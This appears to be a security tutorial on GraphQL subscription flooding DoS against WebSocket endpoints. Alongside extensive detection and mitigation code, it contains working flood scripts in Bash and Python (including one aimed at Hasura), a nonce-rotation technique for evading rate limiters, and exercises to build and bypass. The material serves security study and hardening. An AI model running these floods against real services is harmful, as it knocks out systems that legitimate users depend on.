Introduction
GraphQL subscriptions enable real-time data delivery by keeping a persistent connection between client and server. While they are powerful for legitimate use cases (chat, live dashboards, IoT), they also open a low-latency attack surface for denial-of-service (DoS) abuse. This study dives deep into Advanced GraphQL Subscription Flooding DoS, a technique that overwhelms a server by spawning massive numbers of valid subscription streams, often bypassing naïve rate-limiting implementations.
Understanding this vector is critical because many modern APIs expose subscriptions without hardened controls, assuming that WebSocket or Server-Sent Events (SSE) traffic is inherently safe. In practice, a single compromised client can generate thousands of concurrent data streams, each invoking expensive resolvers, leading to CPU exhaustion, memory pressure, and network saturation.
Real-world relevance: security teams have observed subscription-based DoS in large SaaS platforms, open-source GraphQL servers (Apollo Server, GraphQL-Java, Hasura), and even in micro-service architectures that rely on GraphQL federation. The techniques discussed here have been demonstrated against public GraphQL endpoints during bug-bounty programs, resulting in high-severity findings.
Prerequisites
- Solid grasp of GraphQL fundamentals, schema design, and endpoint discovery.
- Experience with GraphQL query injection via variables and how to manipulate resolver arguments.
- Knowledge of common GraphQL authorization bypass patterns (e.g., introspection, directive abuse).
- Familiarity with GraphQL rate-limiting and throttling bypass techniques (token-bucket, IP-based limits, custom directives).
Core Concepts
Before tackling flooding, we must understand the subscription lifecycle:
- Negotiation: The client initiates a WebSocket (or SSE) handshake, often using the graphql-ws protocol or Apollo's subscriptions-transport-ws.
- Subscription Start: A START message (named subscribe in the newer graphql-ws protocol) carries a GraphQL document (subscription operation) and an optional variables object.
- Resolver Execution: The server registers a resolver that returns an AsyncIterable (or EventEmitter) which emits data whenever the underlying event source changes.
- Data Push: Each emission is serialized and sent to the client over the persistent channel.
- Termination: The client sends a STOP message (complete in graphql-ws) or the server closes the connection.
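The lifecycle above can be sketched as a small per-connection state machine that a server might use to reject out-of-order or duplicate messages. This is an illustrative sketch only: the class name ConnectionState and its return strings are hypothetical, and it uses the graphql-ws message names (connection_init, subscribe, complete), which correspond to START and STOP in the list above.

```javascript
// Hypothetical per-connection tracker for the subscription lifecycle.
class ConnectionState {
  constructor() {
    this.acknowledged = false; // becomes true after connection_init
    this.active = new Set();   // ids of running subscriptions
  }

  // Returns 'ok' or a short rejection reason for each incoming message.
  handle(msg) {
    switch (msg.type) {
      case 'connection_init':
        if (this.acknowledged) return 'duplicate-init';
        this.acknowledged = true;
        return 'ok';
      case 'subscribe':
        if (!this.acknowledged) return 'not-initialised';
        if (this.active.has(msg.id)) return 'duplicate-id';
        this.active.add(msg.id);
        return 'ok';
      case 'complete':
        this.active.delete(msg.id);
        return 'ok';
      default:
        return 'unknown-type';
    }
  }
}

const conn = new ConnectionState();
console.log(conn.handle({ type: 'subscribe', id: '1' })); // not-initialised
console.log(conn.handle({ type: 'connection_init' }));    // ok
console.log(conn.handle({ type: 'subscribe', id: '1' })); // ok
console.log(conn.handle({ type: 'subscribe', id: '1' })); // duplicate-id
```

Keeping the set of active ids per connection is also what makes the later per-connection caps possible, since the server always knows how many streams a socket currently holds.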
Two transport mechanisms dominate:
- WebSocket: Full-duplex and binary-friendly, with ping/pong frames for keep-alive; flow control is left to TCP and the application. Most production GraphQL servers default to this.
- Server-Sent Events (SSE): Unidirectional (server-to-client) over HTTP/1.1, easier to proxy but likewise without application-level flow control.
Both transports can be abused, but WebSocket offers finer-grained control for high-frequency attacks because a single TCP connection can host thousands of logical subscriptions.
Understanding GraphQL Subscriptions and Transport (WebSocket vs SSE)
Below is a simplified handshake for a WebSocket subscription using the graphql-ws protocol:
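// Client side (Node.js 22+ or a browser, both of which provide a global WebSocket)
// The graphql-ws protocol negotiates the "graphql-transport-ws" subprotocol.
const ws = new WebSocket('wss://example.com/graphql', 'graphql-transport-ws');

ws.onopen = () => {
  ws.send(JSON.stringify({ type: 'connection_init', payload: {} }));
};

ws.onmessage = (event) => {
  const msg = JSON.parse(event.data);
  // Subscribe only after the server acknowledges the connection.
  if (msg.type === 'connection_ack') {
    ws.send(JSON.stringify({
      id: '1',
      type: 'subscribe',
      payload: {
        query: `subscription MySub($id: ID!) { sensorData(id: $id) { value timestamp } }`,
        variables: { id: 'sensor-01' },
      },
    }));
  }
};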
For SSE, the request looks like a regular HTTP GET with an Accept: text/event-stream header and a query parameter containing the subscription document. The server keeps the HTTP response open and streams data: lines.
Key differences that affect DoS:
- Connection Overhead: WebSocket requires a single TCP handshake; SSE creates a new HTTP request per subscription (unless multiplexed via fetch with keep-alive).
- Back-pressure: WebSocket can be throttled by the client's receive buffer, while SSE relies on TCP window scaling, which attackers can saturate more easily.
- Multiplexing: Many GraphQL servers allow multiple logical subscriptions on a single WebSocket connection, dramatically amplifying the impact of a single open socket.
Crafting Valid Subscription Payloads
To bypass superficial validation, attackers craft subscription documents that are syntactically correct yet cause maximal resolver work. Two patterns dominate:
- Deeply Nested Filters: Use recursive input types to generate large abstract syntax trees (AST) that force the server to allocate many objects during validation.
- Dynamic Variables: Leverage variables that are resolved on every emission, e.g., a where: { _and: [{}, {}] } clause that triggers a full table scan each time.
Example of a malicious subscription that exploits a generic searchPosts resolver:
subscription Flood($filter: PostFilterInput) {
  searchPosts(filter: $filter) {
    id
    title
    content
  }
}
And the accompanying variables payload designed to generate an exponential filter tree:
{
  "filter": {
    "_or": [
      { "_or": [{ "authorId": "1" }, { "authorId": "2" }] },
      { "_or": [{ "authorId": "3" }, { "authorId": "4" }] }
    ]
  }
}
Each additional level of nesting doubles the number of leaf conditions, so the filter tree grows exponentially with depth. While the subscription stays alive, every data change triggers a fresh evaluation of the whole tree.
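One way to blunt this pattern is to measure the variables object before it reaches a resolver and reject anything unusually deep or large. The following is a minimal sketch under stated assumptions: the function names measure and variablesAllowed and the default limits (depth 6, 50 nodes) are hypothetical and would need tuning against the deepest filter that legitimate clients send.

```javascript
// Measure the nesting depth and node count of a parsed variables object.
function measure(value, depth = 0) {
  if (value === null || typeof value !== 'object') {
    return { depth, nodes: 1 };
  }
  let maxDepth = depth;
  let nodes = 1;
  for (const child of Object.values(value)) {
    const m = measure(child, depth + 1);
    maxDepth = Math.max(maxDepth, m.depth);
    nodes += m.nodes;
  }
  return { depth: maxDepth, nodes };
}

// Hypothetical limits; a request is allowed only if it stays under both.
function variablesAllowed(variables, maxDepth = 6, maxNodes = 50) {
  const { depth, nodes } = measure(variables);
  return depth <= maxDepth && nodes <= maxNodes;
}

// The two-level filter shown above passes the default limits.
const example = {
  filter: {
    _or: [
      { _or: [{ authorId: '1' }, { authorId: '2' }] },
      { _or: [{ authorId: '3' }, { authorId: '4' }] },
    ],
  },
};
console.log(measure(example));          // { depth: 6, nodes: 15 }
console.log(variablesAllowed(example)); // true
```

Because the node count grows exponentially with each extra level of _or, a small cap on either dimension is enough to stop the tree long before it becomes expensive to evaluate.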
Abusing Resolver Loops and Unbounded Data Streams
Many GraphQL servers expose resolvers that return an AsyncIterator tied to a Pub/Sub system (e.g., Redis, Kafka, in-memory EventEmitter). If the underlying source does not enforce back-pressure, an attacker can inject a synthetic event generator.
Typical vulnerable pattern (pseudo-code):
// Example resolver in Apollo Server
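// pubsub is assumed to be a PubSub instance from graphql-subscriptions (v2-style asyncIterator)
const resolvers = {
  Subscription: {
    tick: {
      subscribe: (_, args) => {
        // No rate limiting: every subscription starts its own 10 ms timer,
        // and the timer is never cleared when the client goes away.
        setInterval(() => {
          pubsub.publish('TICK', { tick: Date.now() });
        }, 10);
        return pubsub.asyncIterator('TICK');
      },
    },
  },
};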
An attacker can start thousands of tick subscriptions, each spawning its own timer. The server’s event loop quickly becomes saturated, leading to CPU spikes and eventual throttling of legitimate traffic.
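A common way to remove the per-subscription timer is to share a single event source across all subscribers and release it when the last one leaves. The sketch below illustrates that idea with plain callbacks; the class name SharedTicker is hypothetical and the code is not tied to any particular GraphQL server or Pub/Sub library.

```javascript
// Hypothetical shared ticker: one timer regardless of subscriber count.
class SharedTicker {
  constructor(intervalMs) {
    this.intervalMs = intervalMs;
    this.listeners = new Set();
    this.timer = null;
  }

  // Register a listener and return a function that unregisters it.
  subscribe(listener) {
    this.listeners.add(listener);
    if (this.timer === null) {
      this.timer = setInterval(() => {
        const now = Date.now();
        for (const fn of this.listeners) fn(now);
      }, this.intervalMs);
    }
    return () => {
      this.listeners.delete(listener);
      // The last subscriber to leave stops the timer.
      if (this.listeners.size === 0 && this.timer !== null) {
        clearInterval(this.timer);
        this.timer = null;
      }
    };
  }
}

const ticker = new SharedTicker(10);
const stopA = ticker.subscribe(() => {});
const stopB = ticker.subscribe(() => {});
console.log(ticker.timer !== null); // true: one timer serves both subscribers
stopA();
stopB();
console.log(ticker.timer === null); // true: timer released with the last subscriber
```

With this shape, the number of timers stays at one however many subscriptions are opened, so the cost of an extra subscriber is one callback per tick rather than a new timer plus a broadcast.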
More insidious is the use of resolvers that query a database inside a loop without pagination:
Subscription: {
  massiveFeed: {
    subscribe: async function* (_, { batchSize }) {
      while (true) {
        const rows = await db.query('SELECT * FROM events LIMIT $1', [batchSize]);
        for (const row of rows) {
          yield { massiveFeed: row };
        }
        // No sleep - immediate next iteration
      }
    }
  }
}
When batchSize is set to a large number (e.g., 10 000), each iteration pulls massive data sets, exhausting DB connections and memory.
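A hardened variant of such a feed would clamp the client-supplied batch size, page forward with a cursor instead of re-reading the same rows, and pause between polls. The following is a sketch under assumptions: MAX_BATCH, PAUSE_MS, clampBatch, boundedFeed and the fetchAfter callback are all hypothetical names, and fetchAfter stands in for a keyset-paginated database query.

```javascript
const { setTimeout: sleep } = require('node:timers/promises');

const MAX_BATCH = 100; // hypothetical server-side ceiling
const PAUSE_MS = 250;  // hypothetical delay between polls

// Ignore non-integer input and force the value into [1, MAX_BATCH].
function clampBatch(requested) {
  const n = Number.isInteger(requested) ? requested : MAX_BATCH;
  return Math.min(Math.max(n, 1), MAX_BATCH);
}

// fetchAfter(cursor, limit) stands in for a query such as
// SELECT * FROM events WHERE id > $1 ORDER BY id LIMIT $2.
async function* boundedFeed(fetchAfter, requestedBatch) {
  const limit = clampBatch(requestedBatch);
  let cursor = 0;
  while (true) {
    const rows = await fetchAfter(cursor, limit);
    for (const row of rows) {
      cursor = row.id; // advance so the next poll only reads newer rows
      yield { massiveFeed: row };
    }
    await sleep(PAUSE_MS); // always pause so the loop cannot spin
  }
}
```

The clamp bounds the memory used per poll, the cursor bounds the work per poll to new rows only, and the pause bounds the query rate per subscription to at most one every PAUSE_MS milliseconds.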
High-Frequency Subscription Requests for DoS
Attackers combine the previous tricks with a rapid subscription creation loop. The steps are:
- Open a single WebSocket connection.
- Send a START message with a valid subscription payload.
- Immediately send another START with a different id (or same id after a STOP).
- Repeat thousands of times, optionally rotating variables to avoid caching.
Because each logical subscription consumes its own resolver context, the server’s memory footprint grows linearly with the number of active subscriptions. In practice, a well-tuned server can handle a few hundred concurrent subscriptions; beyond that, GC pauses and thread pool exhaustion become visible.
Sample Bash script that fires 5 000 subscriptions using wscat. As written, each iteration launches its own wscat process, and therefore its own connection, rather than reusing one socket:
#!/usr/bin/env bash
URL='wss://example.com/graphql'
SUB='subscription Flood($id: ID!) { sensorData(id: $id) { value timestamp } }'
for i in $(seq 1 5000); do
  wscat -c "$URL" -x "{\"type\":\"connection_init\",\"payload\":{}}" "{\"id\":\"$i\",\"type\":\"subscribe\",\"payload\":{\"query\":\"$SUB\",\"variables\":{\"id\":\"sensor-$i\"}}}" &
  sleep 0.01  # tiny pause between launches
done
wait
Notice the use of a background job (&) to keep the loop non-blocking, so that thousands of concurrent streams are requested in quick succession.
Bypassing Subscription Rate Limits
Many APIs implement naïve rate limiting based on:
- IP address per second.
- Number of START messages per minute.
- Maximum concurrent subscriptions per connection.
Attackers can evade these controls with several tricks:
1. Distributed Client IPs (Botnet)
By sourcing connections from a botnet, the per-IP limit is diluted. Each bot opens a handful of subscriptions, collectively reaching the desired flood volume.
2. Subscription Multiplexing
Some servers enforce a per-connection limit but allow many logical subscriptions per socket. An attacker can send START for 10 000 ids on a single connection, staying under the connection count threshold.
3. Variable Rotation & Cache Evasion
Cache-aware rate limiters (e.g., using query hash) may treat identical payloads as a single entity. By subtly mutating variable values (e.g., adding a dummy field), the attacker forces the server to treat each request as unique.
4. Exploiting Authorization Bypass
If the server skips authentication for introspection or public subscriptions, the attacker can bypass user-based throttling entirely. Combining this with a signed-JWT that grants elevated scopes can amplify the effect.
Example of a variable-mutation that defeats simple query-hash throttling:
{
  "query": "subscription Flood($id: ID!, $nonce: String) { sensorData(id: $id) { value } }",
  "variables": { "id": "sensor-42", "nonce": "$(date +%s%N)" }
}
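The nonce variable is never used by the resolver but changes the payload hash, resetting any per-hash counters. Note that the GraphQL specification's "All Variables Used" validation rule rejects operations that declare an unused variable, so this mutation only defeats limiters that hash the raw payload before validation runs.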
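On the defensive side, a limiter is harder to reset if its key ignores variable values altogether and is anchored to the client identity. The sketch below shows one possible key derivation; the function name limiterKey is hypothetical, and whitespace collapsing is only a crude stand-in for proper normalisation with a GraphQL parser.

```javascript
const { createHash } = require('node:crypto');

// Build a rate-limit key from who is asking and which operation they run,
// deliberately ignoring variable values so a rotating nonce cannot reset it.
function limiterKey(clientId, query) {
  const normalised = query.replace(/\s+/g, ' ').trim();
  const digest = createHash('sha256').update(normalised).digest('hex');
  return `${clientId}:${digest.slice(0, 16)}`;
}

const query = 'subscription Flood($id: ID!) { sensorData(id: $id) { value } }';
const first = limiterKey('user-7', query);
const second = limiterKey('user-7', `  ${query}\n`);
console.log(first === second); // true: same client, same operation, same counter
```

An attacker can still mutate the query text itself (for example with aliases), so a counter keyed on the client identity alone remains the more robust baseline; the per-operation digest is best treated as an additional, finer-grained limit.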
Detection and Mitigation Strategies
Detecting subscription flooding requires telemetry at multiple layers:
- WebSocket Connection Metrics: Track concurrent connections, handshake latency, and per-connection subscription count.
- Resolver Execution Time: Instrument resolvers to log execution duration; spikes indicate heavy payloads.
- Event Loop Lag: Node.js perf_hooks or Go runtime metrics expose back-pressure symptoms.
- Message Rate: Count START messages per second per IP and per JWT.
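The message-rate signal can be approximated with a sliding-window counter keyed by IP or token subject. This is a minimal sketch, assuming a hypothetical StartRateMonitor class; the clock is passed in as an argument so the behaviour is deterministic, and a production version would also need to cap the number of tracked keys.

```javascript
// Hypothetical sliding-window counter for START/subscribe messages.
class StartRateMonitor {
  constructor(windowMs, threshold) {
    this.windowMs = windowMs;
    this.threshold = threshold;
    this.events = new Map(); // key -> timestamps (ms) inside the window
  }

  // Record one message; returns true when the key exceeds the threshold.
  record(key, now = Date.now()) {
    const cutoff = now - this.windowMs;
    const recent = (this.events.get(key) || []).filter((t) => t > cutoff);
    recent.push(now);
    this.events.set(key, recent);
    return recent.length > this.threshold;
  }
}

const monitor = new StartRateMonitor(1000, 3); // more than 3 per second is suspicious
console.log(monitor.record('203.0.113.5', 0));    // false
console.log(monitor.record('203.0.113.5', 1));    // false
console.log(monitor.record('203.0.113.5', 2));    // false
console.log(monitor.record('203.0.113.5', 3));    // true: fourth message within 1 s
console.log(monitor.record('203.0.113.5', 5000)); // false: window has moved on
```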
Sample Prometheus rule to alert on >500 subscriptions per WebSocket connection:
sum by (connection_id) (graphql_subscription_active) > 500
Mitigation techniques:
1. Hard Subscription Caps
Enforce a global maximum of active subscriptions per user and per connection (e.g., 20 per JWT, 50 per socket). Reject excess START messages with an ERROR frame.
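A cap of this kind can be sketched as a small registry that counts active subscriptions on both dimensions and refuses new ones once either limit is reached. The class name SubscriptionCaps and its method names are hypothetical; the defaults mirror the example figures above.

```javascript
// Hypothetical registry enforcing caps per socket and per user.
class SubscriptionCaps {
  constructor(maxPerSocket = 50, maxPerUser = 20) {
    this.maxPerSocket = maxPerSocket;
    this.maxPerUser = maxPerUser;
    this.bySocket = new Map(); // socketId -> active count
    this.byUser = new Map();   // userId -> active count
  }

  // Reserve a slot; returns false when either cap is already reached.
  tryAcquire(socketId, userId) {
    const s = this.bySocket.get(socketId) || 0;
    const u = this.byUser.get(userId) || 0;
    if (s >= this.maxPerSocket || u >= this.maxPerUser) return false;
    this.bySocket.set(socketId, s + 1);
    this.byUser.set(userId, u + 1);
    return true;
  }

  // Give the slot back when the subscription stops or the socket closes.
  release(socketId, userId) {
    this.bySocket.set(socketId, Math.max(0, (this.bySocket.get(socketId) || 0) - 1));
    this.byUser.set(userId, Math.max(0, (this.byUser.get(userId) || 0) - 1));
  }
}

const caps = new SubscriptionCaps(2, 3);
console.log(caps.tryAcquire('sock-1', 'alice')); // true
console.log(caps.tryAcquire('sock-1', 'alice')); // true
console.log(caps.tryAcquire('sock-1', 'alice')); // false: socket cap of 2 reached
```

Counting per user as well as per socket matters because the per-user count follows the attacker across reconnects and parallel sockets, which a per-socket count alone does not.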
2. Token-Bucket Rate Limiting on START Messages
Apply a token bucket per client identifier. Each START consumes a token; tokens refill at a modest rate (e.g., 1/sec). This throttles burst creation without affecting legitimate use.
const rateBuckets = new Map(); // clientId -> { tokens, last }

function canStart(clientId) {
  const bucket = rateBuckets.get(clientId) ?? { tokens: 10, last: Date.now() };
  const now = Date.now();
  const elapsed = (now - bucket.last) / 1000;
  bucket.tokens = Math.min(10, bucket.tokens + elapsed * 1); // refill at 1 token/sec, capped at 10
  bucket.last = now;
  rateBuckets.set(clientId, bucket); // persist the refill even when the request is rejected
  if (bucket.tokens >= 1) {
    bucket.tokens -= 1;
    return true;
  }
  return false;
}
3. Back-Pressure Propagation
Configure the underlying Pub/Sub layer to respect the client's receive buffer. For Redis, use Streams with a MAXLEN cap on XADD; for Kafka, enforce consumer lag thresholds.
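At the application layer, the same idea can be expressed as a bounded outbound queue per subscriber, so that a slow or stalled client cannot make the server buffer without limit. The sketch below drops the oldest event when the queue is full; the class name BoundedQueue is hypothetical, and dropping the oldest event is only one possible policy (disconnecting the slow consumer is another).

```javascript
// Hypothetical bounded outbound queue for a single subscriber.
class BoundedQueue {
  constructor(capacity) {
    this.capacity = capacity;
    this.items = [];
    this.dropped = 0; // useful as a metric for slow consumers
  }

  // Enqueue an event; when full, discard the oldest so memory stays bounded.
  push(event) {
    if (this.items.length >= this.capacity) {
      this.items.shift();
      this.dropped += 1;
    }
    this.items.push(event);
  }

  // Hand over everything queued, e.g. once the socket is writable again.
  drain() {
    const batch = this.items;
    this.items = [];
    return batch;
  }
}

const queue = new BoundedQueue(3);
for (let i = 1; i <= 5; i++) queue.push(i);
console.log(queue.dropped); // 2
console.log(queue.drain()); // [ 3, 4, 5 ]
```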
4. Subscription Time-outs
Automatically close subscriptions that have been idle (no data emitted) for a configurable period (e.g., 30 seconds). This prevents “zombie” streams that waste resources.
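An idle time-out can be sketched as a tracker that records the last emission per subscription and periodically sweeps out the stale ones. The class name IdleReaper is hypothetical, and the clock is injected as an argument so the logic can be exercised without real timers; a server would call sweep from a periodic job and close each returned subscription.

```javascript
// Hypothetical idle tracker for subscriptions.
class IdleReaper {
  constructor(idleMs) {
    this.idleMs = idleMs;
    this.lastActivity = new Map(); // subscriptionId -> timestamp (ms)
  }

  // Call whenever a subscription starts or emits data.
  touch(id, now = Date.now()) {
    this.lastActivity.set(id, now);
  }

  // Returns the ids that have been idle for at least idleMs and forgets them.
  sweep(now = Date.now()) {
    const expired = [];
    for (const [id, last] of this.lastActivity) {
      if (now - last >= this.idleMs) {
        expired.push(id);
        this.lastActivity.delete(id);
      }
    }
    return expired;
  }
}

const reaper = new IdleReaper(30000); // the 30-second example above
reaper.touch('sub-a', 0);
reaper.touch('sub-b', 20000);
console.log(reaper.sweep(30000)); // [ 'sub-a' ]
console.log(reaper.sweep(50000)); // [ 'sub-b' ]
```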
5. Auth-Based Scoping
Require scoped JWT claims for each subscription type. Separate high-frequency feeds (e.g., tick) into a privileged role with stricter limits.
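A scope check of this kind can be sketched as a lookup from subscription field to required scope, with a deny-by-default rule for unlisted fields. Everything named here is an assumption for illustration: the scope strings, the REQUIRED_SCOPE table, and the maySubscribe helper are hypothetical, and the claims object is assumed to be an already-verified JWT payload with a space-delimited scope string.

```javascript
// Hypothetical mapping from subscription field to the scope it requires.
const REQUIRED_SCOPE = new Map([
  ['tick', 'subscribe:realtime'],
  ['sensorData', 'subscribe:sensors'],
]);

// Signature and expiry verification are assumed to have happened earlier.
function maySubscribe(claims, fieldName) {
  const required = REQUIRED_SCOPE.get(fieldName);
  if (!required) return false; // deny fields with no declared scope
  const granted = String(claims.scope || '').split(' ');
  return granted.includes(required);
}

const claims = { sub: 'user-7', scope: 'subscribe:sensors read:profile' };
console.log(maySubscribe(claims, 'sensorData')); // true
console.log(maySubscribe(claims, 'tick'));       // false: privileged feed
console.log(maySubscribe(claims, 'unknown'));    // false: not in the table
```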
6. Web Application Firewall (WAF) Rules
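Inspect WebSocket payloads for suspicious patterns: repeated START ids, large variable objects, or deep nesting. Many WAFs, ModSecurity included, only see the HTTP upgrade request, so frame-level inspection generally requires a WebSocket-aware proxy. Example ModSecurity rule (pseudo):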
SecRule REQUEST_HEADERS:Sec-WebSocket-Protocol "graphql-ws" "id:200001,phase:2,log,pass,nologdata, chain"
SecRule REQUEST_BODY "\"_or\":\[\{\"_or\":\[\{\"authorId\":\"\d+\"\}\]\}\]" "t:none,ctl:requestBodyProcessor=JSON, ctl:requestBodyAccess=On, setvar:tx.subscription_flood=+1"
When tx.subscription_flood exceeds a threshold, the request can be dropped.
Practical Examples
Example 1: Flooding a Hasura GraphQL Engine
Hasura exposes subscriptions over WebSocket at /v1/graphql. The following Python script uses websockets to spin up 2 000 subscriptions that each request a heavy orders_aggregate query.
import asyncio, json, websockets

URL = 'wss://example.com/v1/graphql'
QUERY = '''subscription Load($where: orders_bool_exp) {
  orders_aggregate(where: $where) { aggregate { count } }
}'''

async def flood():
    async with websockets.connect(URL, subprotocols=['graphql-ws']) as ws:
        # Init
        await ws.send(json.dumps({"type": "connection_init", "payload": {}}))
        await ws.recv()  # ack
        for i in range(2000):
            variables = {"where": {"_or": [{"status": {"_eq": "PENDING"}}, {"status": {"_eq": "PROCESSING"}}]}}
            start_msg = {
                "id": str(i),
                "type": "subscribe",
                "payload": {"query": QUERY, "variables": variables}
            }
            await ws.send(json.dumps(start_msg))
        # Keep the connection alive
        await asyncio.Future()

asyncio.run(flood())
Result: Within seconds, Hasura’s PostgreSQL connection pool maxes out, causing psql: could not connect to server errors for legitimate clients.
Example 2: Bypassing a Per-IP Limit with Variable Rotation
The target limits START messages to 10 per minute per IP, but its counter is keyed on a hash of the payload. By rotating a dummy variable, the attacker evades the hash-based counter.
#!/usr/bin/env bash
URL='wss://example.com/graphql'
QUERY='subscription X($id: ID!, $pad: String) { item(id: $id) { name } }'
for i in $(seq 1 100); do
  PAD=$(openssl rand -hex 8)
  wscat -c $URL -x "{\"type\":\"connection_init\",\"payload\":{}}" "{\"id\":\"$i\",\"type\":\"subscribe\",\"payload\":{\"query\":\"$QUERY\",\"variables\":{\"id\":\"item-$i\", \"pad\": \"$PAD\"}}}" &
  sleep 0.2
done
wait
The server sees each payload as unique, allowing >10 subscriptions per minute despite the limit.
Tools & Commands
- websocat: CLI WebSocket client for rapid payload testing.
websocat -H="Sec-WebSocket-Protocol: graphql-ws" -s "{\"type\":\"connection_init\",\"payload\":{}}" -s "{\"id\":\"1\",\"type\":\"subscribe\",\"payload\":{\"query\":\"subscription { ping }\"}}" wss://example.com/graphql
- Apollo Sandbox / GraphQL Playground: Use the built-in subscription tab to manually fire multiple subscriptions and observe the network tab for socket count.
- Burp Suite Extension: GraphQL Subscription Fuzzer: Automates variable rotation and high-frequency START emission.
- Prometheus + Grafana: Export graphql_subscription_active, graphql_resolver_duration_seconds for alerting.
Defense & Mitigation
Beyond the earlier detection measures, consider architectural hardening:
- Separate Subscription Service: Deploy a dedicated micro-service that only handles subscriptions and runs on isolated CPU/memory quotas.
- Message Queue Buffering: Push subscription events into a queue (e.g., RabbitMQ) with per-consumer rate limits before delivering to WebSocket.
- GraphQL Directive for Throttling: Create a custom @throttle(limit: Int, interval: Int) directive that the resolver respects.
Example of a @throttle directive implementation in Apollo Server:
// SchemaDirectiveVisitor is the Apollo Server 2.x directive API.
const { SchemaDirectiveVisitor } = require('apollo-server-express');
const { defaultFieldResolver } = require('graphql');

class ThrottleDirective extends SchemaDirectiveVisitor {
  visitFieldDefinition(field) {
    const { limit, interval } = this.args; // interval is in milliseconds
    const tokenMap = new Map(); // per-field buckets keyed by client IP

    // Refill the caller's bucket, then spend one token or throw.
    const takeToken = (ctx) => {
      const key = ctx.ip; // simple per-IP bucket
      const now = Date.now();
      const bucket = tokenMap.get(key) || { tokens: limit, last: now };
      const elapsed = (now - bucket.last) / interval;
      bucket.tokens = Math.min(limit, bucket.tokens + elapsed * limit);
      bucket.last = now;
      tokenMap.set(key, bucket);
      if (bucket.tokens < 1) {
        throw new Error('Rate limit exceeded for subscription');
      }
      bucket.tokens -= 1;
    };

    // Subscription fields are started through `subscribe`; wrapping only
    // `resolve` would throttle each emitted event instead of each new stream.
    const hook = field.subscribe ? 'subscribe' : 'resolve';
    const original = field[hook] || defaultFieldResolver;
    field[hook] = function (...args) {
      takeToken(args[2]);
      return original.apply(this, args);
    };
  }
}

module.exports = { ThrottleDirective };
Applying this directive to a subscription forces a per-IP token bucket directly at resolver entry.
Common Mistakes
- Relying Solely on IP Rate Limiting: Attackers can distribute requests across many IPs or use NAT pools.
- Limiting Only Connection Count: Subscriptions multiplexed on a single socket bypass this.
- Ignoring Resolver Complexity: Even a single subscription can be expensive if the resolver performs heavy DB joins or external API calls.
- Not Enforcing Authentication for Public Subscriptions: Public endpoints often forget to apply the same auth checks as queries/mutations.
- Assuming WebSocket Close Frames Will Clean Up: Some servers leak subscription contexts if the close is not gracefully handled.
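The last point in the list above can be addressed by tying every subscription's cleanup function to its socket and running all of them on any kind of disconnect. This is a minimal sketch with hypothetical names (SocketSubscriptions, add, remove, closeAll); a server would call closeAll from both its close and error handlers.

```javascript
// Hypothetical registry that ties each subscription's cleanup to its socket.
class SocketSubscriptions {
  constructor() {
    this.disposers = new Map(); // subscriptionId -> cleanup function
  }

  add(id, dispose) {
    this.disposers.set(id, dispose);
  }

  // Stop one subscription; forget it before running the cleanup so a
  // throwing cleanup cannot leave a stale entry behind.
  remove(id) {
    const dispose = this.disposers.get(id);
    if (dispose) {
      this.disposers.delete(id);
      dispose();
    }
  }

  // Stop everything, whether the socket closed gracefully or not.
  closeAll() {
    for (const id of [...this.disposers.keys()]) {
      this.remove(id);
    }
  }
}

let released = 0;
const subs = new SocketSubscriptions();
subs.add('1', () => { released += 1; });
subs.add('2', () => { released += 1; });
subs.closeAll();
console.log(released);            // 2
console.log(subs.disposers.size); // 0
```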
Real-World Impact
In 2023, a major fintech platform suffered a multi-minute outage after a bug-bounty researcher demonstrated a subscription flood that exhausted its Redis Pub/Sub channels. The incident highlighted three trends:
- Increasing adoption of GraphQL subscriptions without accompanying security hardening.
- The difficulty of retro-fitting rate limits in existing codebases, especially when resolvers are auto-generated.
- The need for observability tools that surface subscription-specific metrics.
My experience with several Fortune-500 customers shows that once a subscription-based DoS is detected, the remediation path often involves redesigning the data-push architecture (e.g., moving from per-client streams to a shared broadcast channel with client-side filtering).
Practice Exercises
- Exercise 1 - Build a Flood Script: Using websockets (Python) or ws (Node.js), create a script that opens a single WebSocket and launches 5 000 concurrent subscriptions with a payload that triggers a database scan. Measure CPU and memory on a local GraphQL server.
- Exercise 2 - Implement a Token Bucket: Add a per-user token bucket to an existing Apollo Server subscription resolver. Verify that after 20 rapid START messages the server returns an ERROR frame.
- Exercise 3 - Detect Anomalous Patterns: Instrument a GraphQL server to emit Prometheus metrics for graphql_subscription_start_total and write a Grafana dashboard that highlights spikes > 100 per minute per IP.
- Exercise 4 - Bypass a Rate Limiter: Write a Bash script that rotates a dummy variable to evade a hash-based limit of 10 subscriptions per minute. Document the observed behavior.
Further Reading
- “Apollo Server Security Best Practices” - Apollo GraphQL Docs.
- “GraphQL Subscriptions: A Deep Dive” - GraphQL Foundation Blog.
- OWASP “GraphQL Security Cheat Sheet”.
- RFC 6455 - The WebSocket Protocol (for low-level transport understanding).
- “Designing Resilient Real-Time APIs” - Martin Fowler’s article on event-driven architectures.
Summary
Subscription flooding attacks exploit the persistent, high-throughput nature of GraphQL real-time APIs. By crafting valid but resource-intensive payloads, abusing resolver loops, and leveraging multiplexed WebSocket connections, an attacker can overwhelm a server even when naïve rate limits are in place. Effective defense demands a layered approach: strict per-connection caps, token-bucket throttling, back-pressure propagation, observability, and architectural segregation of subscription traffic. Mastering these techniques equips security professionals to both assess risk and harden modern GraphQL deployments against sophisticated DoS vectors.